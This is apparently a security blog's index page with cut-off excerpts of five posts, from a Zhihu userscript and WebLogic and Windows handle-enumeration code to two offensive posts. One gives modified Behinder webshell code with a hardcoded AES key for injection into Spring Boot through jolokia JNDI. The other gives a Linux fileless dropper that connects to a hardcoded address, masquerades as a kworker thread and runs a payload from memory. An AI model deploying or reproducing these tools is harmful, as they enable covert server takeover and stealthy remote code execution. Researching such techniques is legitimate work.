Blog posts

Tampermonkey script: restoring Zhihu's "follow column" feature

Zhihu removed the "follow column" feature but kept the "unfollow column" feature. Capturing the unfollow request shows an OPTIONS request right before it that advertises PUT, DELETE and other methods, so following is presumably a PUT. Trying a PUT returned an error. Trying it on a different column, the follow succeeded, so it appears a column that is already followed cannot be followed again. That gives the idea for the script, which is as follows:

// ==UserScript==
// @name 知乎关注专栏
// @namespace http://tampermonkey.net/
// @version 0.1
// @description 恢复知乎关注专栏功能
// @author You
// @match https://www.zhihu.com/column/*
// @require https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js
// @grant none
// ==/UserScript==
//copy from https://gist.githubusercontent.com/raw/2625891/waitForKeyElements.js
function waitForKeyElements (
    selectorTxt, /* Required: The jQuery selector string that specifies the desired element(s). */
    actionFunction, /* Required: The code to run when elements are found. It is passed a jNode to the matched element. */
    bWaitOnce, /* Opt

Injecting a Behinder (冰蝎) in-memory webshell into Spring Boot in practice

This post uses the JNDI injection in Spring Boot's jolokia endpoint as an example of how to inject a Behinder (冰蝎) in-memory webshell into a server; the environment comes from SpringBootVulExploit. First, the modified Behinder code:

package com.evil;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
public class Beh{
    public void index(final HttpServletRequest req, final HttpServletResponse resp) {
        try {
            if (req.getMethod().equals("POST")) {
                String k = "e45e329feb5d925b"; // rebeyond
                HttpSession session = req.getSession();
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
                final Map myPageContext = new HashMap ();
                myPageContext.put("

How to programmatically obtain WebLogic's server name, ListenAddress, port and version

Reference: get-the-name-of-the-server-in-which-i-am-receiving-requests-to-my-app-on-weblogi

// imports needed by the snippet below
import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.naming.InitialContext;

try {
    InitialContext ctx = new InitialContext();
    // the server name is passed to the JVM as the weblogic.Name system property
    String serverName = System.getProperty("weblogic.Name");
    // the runtime MBean server is bound in JNDI for applications deployed on WebLogic
    MBeanServer server = (MBeanServer)ctx.lookup("java:comp/env/jmx/runtime");
    ObjectName objName = new ObjectName("com.bea:Name=" + serverName + ",Type=ServerRuntime");
    Integer port = (Integer)server.getAttribute(objName, "ListenPort");
    String ListenAddress = (String)server.getAttribute(objName, "ListenAddress");
    String WeblogicVersion = (String)server.getAttribute(objName, "WeblogicVersion");
    System.out.println("Server Name : " + serverName + " Listen Address : " + ListenAddress + " PORT : " + port + " WeblogicVersion : " + WeblogicVersion);
} catch(Exception e) {
    //
}

Enumerating all file handles of a process

The code comes from "Enumerating opened handles from a process", with a few small bugs fixed.

#ifndef UNICODE
#define UNICODE
#endif
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectBasicInformation 0
#define ObjectNameInformation 1
#define ObjectTypeInformation 2
typedef NTSTATUS(NTAPI *_NtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);
typedef NTSTATUS(NTAPI *_NtDuplicateObject)(
    HANDLE SourceProcessHandle,
    HANDLE SourceHandle,
    HANDLE TargetProcessHandle,
    PHANDLE TargetHandle,
    ACCESS_MASK DesiredAccess,
    ULONG Attributes,
    ULONG Options
);
typedef NTSTATUS(NTAPI *_NtQueryObject)(
    HANDLE ObjectHandle,
    ULONG ObjectInformationClass,
    PVOID ObjectInformation,
    ULONG ObjectInformationLength,
    PULONG ReturnLength
);
typedef struct _UNICODE_STRING

Linux fileless process injection

This post reproduces Super-Stealthy Droppers. Testing found some bugs in the code that cause problems when it is used remotely, so it has been polished a little. memfd_create + fexecve: memfd_create requires kernel 3.17 or later, fexecve requires glibc 2.3.2 or later.

#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define __NR_memfd_create 319
#define MFD_CLOEXEC 1
static inline int memfd_create(const char *name, unsigned int flags) {
    return syscall(__NR_memfd_create, name, flags);
}
extern char **environ;
int main(int argc, char **argv) {
    int fd, s;
    unsigned long addr = 0x0100007f11110002;
    char *args[2] = {"[kworker/u!0]", NULL};
    char buf[1024];
    int num;
    // Connect
    if ((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) exit(1);
    if (connect(s, (struc